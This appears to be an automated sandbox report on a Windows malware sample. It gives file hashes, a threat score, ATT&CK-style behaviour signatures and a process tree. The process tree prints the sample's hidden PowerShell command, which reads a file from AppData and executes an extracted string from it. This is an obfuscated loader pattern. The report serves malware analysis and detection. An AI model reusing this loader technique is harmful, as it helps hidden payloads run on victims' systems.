Analysis

  • max time kernel
    119s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
  • submitted
    19/03/2025, 15:01

General

  • Target

    71427E30168BE4926A10FE21DAE81C7A.exe

  • Size

    490KB

  • MD5

    71427e30168be4926a10fe21dae81c7a

  • SHA1

    aee4f1bec725c899b9a9f03f93a18a1947b79995

  • SHA256

    f9bc3826335bcf6a03da3b8743c2bdcbc7747962786a83c90fd2b1d3c8b85353

  • SHA512

    489c8f52af9111dd1c732afdd9d249c644da06892495c6bacc2f0f76b3d0b0b491fd2b5371f9859b676b2ae6b42039d4cc630e102f5774d2be92a839e3498847

  • SSDEEP

    12288:hd9jqKTPrjjpshfe+ZXP/51bt6YtRhp9S8Uy514LyYR27:zcK/5shfe+ZXZr7/hNU6OTR4

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell with its display window hidden.

  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\71427E30168BE4926A10FE21DAE81C7A.exe
    "C:\Users\Admin\AppData\Local\Temp\71427E30168BE4926A10FE21DAE81C7A.exe"
    1⤵
    • Drops file in System32 directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2344
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell.exe -windowstyle hidden "$Dynastinae=GC -Raw 'C:\Users\Admin\AppData\Roaming\Mellemstykke\ferskvandsfisks\Wifiekie.Ove';$Tenders=$Dynastinae.SubString(53339,3);.$Tenders($Dynastinae)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1636

Network

MITRE ATT&CK Enterprise v15

Downloads

  • memory/1636-9-0x0000000074351000-0x0000000074352000-memory.dmp (Filesize: 4KB)
  • memory/1636-10-0x0000000074350000-0x00000000748FB000-memory.dmp (Filesize: 5.7MB)
  • memory/1636-11-0x0000000074350000-0x00000000748FB000-memory.dmp (Filesize: 5.7MB)
  • memory/1636-12-0x0000000074350000-0x00000000748FB000-memory.dmp (Filesize: 5.7MB)
  • memory/1636-13-0x0000000074350000-0x00000000748FB000-memory.dmp (Filesize: 5.7MB)
  • memory/1636-14-0x0000000074350000-0x00000000748FB000-memory.dmp (Filesize: 5.7MB)